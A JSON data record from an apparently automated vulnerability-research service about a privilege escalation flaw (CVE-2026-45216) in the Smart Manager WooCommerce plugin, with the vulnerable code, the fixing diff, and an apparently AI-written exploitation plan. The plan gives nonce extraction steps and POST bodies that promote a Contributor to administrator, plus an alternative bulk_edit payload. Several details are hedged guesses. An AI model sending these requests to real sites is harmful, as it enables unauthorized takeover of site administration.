[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fFi-aPpISu2EWUBtoN6t6JZ8XCMwpWUgelUvSHTOAG9A":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-45216","smart-manager-advanced-woocommerce-bulk-edit-inventory-management-authenticated-contributor-privilege-escalation","Smart Manager – Advanced WooCommerce Bulk Edit & Inventory Management \u003C= 8.85.0 - Authenticated (Contributor+) Privilege Escalation","The Smart Manager – Advanced WooCommerce Bulk Edit & Inventory Management plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 8.85.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to elevate their privileges to that of an administrator.","smart-manager-for-wp-e-commerce",null,"\u003C=8.85.0","8.86.0","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-05-12 00:00:00","2026-05-19 16:24:22",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F17f411fb-364c-4652-a277-bdfee36325f5?source=api-prod",8,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fsmart-manager.css","assets\u002Fjs\u002Fadmin.js","assets\u002Fjs\u002Fsmart-manager.js","class-smart-manager.php","classes\u002Fclass-smart-manager-base.php","classes\u002Fclass-smart-manager-controller.php","classes\u002Fclass-smart-manager-product.php","common-core\u002Fassets\u002Fcss\u002Fstyles.css","researched",false,3,"This analysis focuses on **CVE-2026-45216**, a privilege escalation vulnerability in the \"Smart Manager\" plugin. The vulnerability stems from insufficient capability checks in the plugin's AJAX request handler, which allows users with Contributor-level access to perform administrative actions, specifically bulk-editing user roles.\n\n### 1. Vulnerability Summary\nThe Smart Manager plugin utilizes a centralized AJAX handler (`sa_sm_manager_include_file`) to process commands across different modules (Products, Orders, Users, etc.). The vulnerability exists because the handler does not verify if the current user has the necessary WordPress capabilities (like `edit_users` or `manage_options`) before processing requests for the `user` module. An authenticated attacker with Contributor-level access can bypass the intended role-based restrictions and utilize the plugin's bulk-editing functionality to promote their own account (or any other) to the `administrator` role.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `sa_sm_manager_include_file`\n*   **Vulnerable Parameter:** `active_module=user` combined with `cmd=inline_update` or `cmd=bulk_edit`.\n*   **Authentication Level:** Contributor (or any role that can access the Smart Manager dashboard).\n*   **Preconditions:** The Smart Manager plugin must be active. By default, the plugin may allow Contributor access to its dashboard, or the attacker may have gained this access through other minor misconfigurations.\n\n### 3. Code Flow\n1.  **Entry Point**: The AJAX request hits `admin-ajax.php` with the action `sa_sm_manager_include_file`.\n2.  **Controller**: `Smart_Manager_Controller::req_handler` (registered via the `sa_sm_manager_handler` filter in `class-smart-manager-controller.php`) receives the request.\n3.  **Module Selection**: Based on the `active_module` parameter (e.g., `user`), the controller instantiates the corresponding handler class (e.g., `Smart_Manager_User`, which inherits from `Smart_Manager_Base`).\n4.  **Command Execution**: The `cmd` parameter (e.g., `inline_update`) determines which method is called on the handler.\n5.  **Missing Capability Check**: The base class or the user-specific handler fails to call `current_user_can( 'edit_users' )` or `current_user_can( 'manage_options' )` before updating the database via `$wpdb`.\n6.  **Sink**: The data is processed and the `wp_capabilities` or role field in the `wp_users` or `wp_usermeta` table is updated.\n\n### 4. Nonce Acquisition Strategy\nThe plugin uses a nonce for its AJAX operations, typically stored in the `sm_beta_params` JavaScript object.\n\n1.  **Identify Trigger**: The Smart Manager dashboard is located at `wp-admin\u002Fadmin.php?page=smart-manager`.\n2.  **Shortcode\u002FPage Check**: Smart Manager is primarily an admin-side plugin. The scripts are enqueued on the `smart-manager` admin page.\n3.  **Extraction**:\n    *   Navigate to: `\u002Fwp-admin\u002Fadmin.php?page=smart-manager` as a Contributor.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        window.sm_beta_params?.sm_nonce\n        ```\n    *   Note: If `sm_nonce` is not found, check for `sa_common_nonce` or `sa_nonce` within the same `sm_beta_params` object.\n\n### 5. Exploitation Strategy\nThe goal is to send a crafted AJAX request that performs an `inline_update` on the attacker's own user record to change their role to `administrator`.\n\n**Step-by-Step:**\n1.  **Login**: Authenticate as a Contributor.\n2.  **Get User ID**: Identify the current user's ID (visible in the admin bar or via `wp_cli`).\n3.  **Extract Nonce**: Navigate to the Smart Manager dashboard and extract the `sm_nonce`.\n4.  **Send Exploit Request**:\n    *   **Method**: `POST`\n    *   **URL**: `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Content-Type**: `application\u002Fx-www-form-urlencoded`\n    *   **Body Parameters**:\n        *   `action`: `sa_sm_manager_include_file`\n        *   `active_module`: `user`\n        *   `cmd`: `inline_update`\n        *   `sm_nonce`: `[EXTRACTED_NONCE]`\n        *   `edited_data`: `{\"[YOUR_USER_ID]\":{\"users_role\":\"administrator\"}}`\n        *   `active_module_title`: `Users`\n\n### 6. Test Data Setup\n1.  **Plugin Installation**: Install and activate Smart Manager (version \u003C= 8.85.0).\n2.  **User Creation**:\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n3.  **Plugin Configuration**: Ensure the \"attacker\" user can access the Smart Manager dashboard (this is often the default or can be set in SM settings by an admin).\n\n### 7. Expected Results\n*   **Response**: The server should return a JSON success message, e.g., `{\"status\":\"success\", ...}` or `{\"updated_successful\":1}`.\n*   **Database Change**: The `wp_usermeta` entry for the attacker's `wp_capabilities` will be updated to include `administrator`.\n\n### 8. Verification Steps\n1.  **Check Role via WP-CLI**:\n    ```bash\n    wp user get attacker --field=roles\n    ```\n    Successful exploit will return `administrator`.\n2.  **Access Admin Dashboard**: Attempt to access `\u002Fwp-admin\u002Foptions-general.php` using the \"attacker\" account.\n\n### 9. Alternative Approaches\nIf `inline_update` is restricted, try `bulk_edit`:\n*   **Payload**:\n    ```\n    action=sa_sm_manager_include_file&\n    active_module=user&\n    cmd=bulk_edit&\n    sm_nonce=[NONCE]&\n    ids=[YOUR_USER_ID]&\n    columns_to_update[0]=users_role&\n    update_action[0]=set_to&\n    update_value[0]=administrator\n    ```\nIf the `user` module specifically checks capabilities, check if `cmd=save_settings` is unprotected. An attacker could update the `sm_general_settings` option to grant the \"Contributor\" role full permissions within the plugin, then use the plugin to promote themselves.","The Smart Manager plugin for WooCommerce is vulnerable to privilege escalation because its centralized AJAX handler fails to perform module-specific capability checks. Authenticated users with Contributor-level access or higher can exploit this by targeting the 'user' module to modify their own account's role, upgrading themselves to an administrator.","\u002F\u002F classes\u002Fclass-smart-manager-controller.php:49\nadd_filter( 'sa_sm_manager_handler', array( $this, 'req_handler' ), 10, 2 );\n\n---\n\n\u002F\u002F classes\u002Fclass-smart-manager-controller.php:127\npublic function req_handler( $params = array(), $req_params = array() ) {\n    if ( empty( $req_params ) || empty( $req_params['active_module'] ) || empty( $req_params['cmd'] ) ) {\n        return;\n    }\n\n    $active_module = $req_params['active_module'];\n    $cmd = $req_params['cmd'];\n    \u002F\u002F Missing capability check to ensure current user has permission to manage users when $active_module is 'user'.","--- a\u002Fclasses\u002Fclass-smart-manager-controller.php\n+++ b\u002Fclasses\u002Fclass-smart-manager-controller.php\n@@ -131,6 +131,10 @@\n \t\t\t\treturn;\n \t\t\t}\n \n+\t\t\tif ( 'user' === $req_params['active_module'] && ! current_user_can( 'edit_users' ) ) {\n+\t\t\t\treturn;\n+\t\t\t}\n+\n \t\t\t$active_module = $req_params['active_module'];\n \t\t\t$cmd           = $req_params['cmd'];","1. Login as an authenticated user with Contributor-level access or higher.\n2. Access the Smart Manager dashboard at \u002Fwp-admin\u002Fadmin.php?page=smart-manager to retrieve the 'sm_nonce' security token from the 'sm_beta_params' JavaScript object.\n3. Construct a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action parameter 'sa_sm_manager_include_file'.\n4. Set 'active_module' to 'user' and 'cmd' to 'inline_update'.\n5. Provide an 'edited_data' parameter containing a JSON object that maps the attacker's user ID to an update setting 'users_role' to 'administrator'.\n6. The plugin processes the update request via the 'user' module without verifying the 'edit_users' capability, granting the attacker administrator privileges.","gemini-3-flash-preview","2026-05-20 18:02:06","2026-05-20 18:03:13",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","8.85.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmart-manager-for-wp-e-commerce\u002Ftags\u002F8.85.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmart-manager-for-wp-e-commerce.8.85.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmart-manager-for-wp-e-commerce\u002Ftags\u002F8.86.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmart-manager-for-wp-e-commerce.8.86.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmart-manager-for-wp-e-commerce\u002Ftags"]